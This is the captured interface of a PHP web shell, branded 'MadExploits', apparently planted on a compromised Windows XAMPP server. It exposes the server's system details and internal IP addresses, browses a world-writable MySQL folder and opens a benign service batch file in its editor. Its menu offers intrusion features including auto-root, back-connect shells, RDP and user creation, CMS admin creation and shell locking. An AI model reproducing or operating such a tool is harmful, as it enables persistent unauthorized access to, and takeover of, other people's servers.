Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
mysql /
[ HOME SHELL ]
Name
Size
Permission
Action
backup
[ DIR ]
drwxrwxrwx
bin
[ DIR ]
drwxrwxrwx
data
[ DIR ]
drwxrwxrwx
scripts
[ DIR ]
drwxrwxrwx
share
[ DIR ]
drwxrwxrwx
COPYING
17.57
KB
-rw-rw-rw-
CREDITS
2.3
KB
-rw-rw-rw-
EXCEPTIONS-CLIENT
8.05
KB
-rw-rw-rw-
README.md
3.03
KB
-rw-rw-rw-
THIRDPARTY
84.24
KB
-rw-rw-rw-
mysql_installservice.bat
848
B
-rwxrwxrwx
mysql_uninstallservice.bat
395
B
-rwxrwxrwx
resetroot.bat
1.07
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql_installservice.bat
@echo off if "%OS%" == "Windows_NT" goto WinNT :Win9X echo Don't be stupid! Win9x don't know Services echo Please use mysql_start.bat instead goto exit :WinNT if exist %windir%\my.ini GOTO CopyINI if exist c:\my.cnf GOTO CopyCNF if not exist %windir%\my.ini GOTO MainNT if not exist c:\my.cnf GOTO MainNT :CopyINI echo Safe the %windir%\my.ini as %windir%\my.ini.old! copy %windir%\my.ini /-y %windir%\my.ini.old del %windir%\my.ini GOTO WinNT :CopyCNF echo Safe the c:\my.cnf as c:\my.cnf.old! copy c:\my.cnf /-y c:\my.cnf.old del c:\my.cnf GOTO WinNT :MainNT echo Installing MySQL as an Service copy "%cd%\bin\my.cnf" /-y %windir%\my.ini bin\mysqld --install mysql --defaults-file="%cd%\bin\my.ini" echo Try to start the MySQL deamon as service ... net start MySQL :exit pause
Close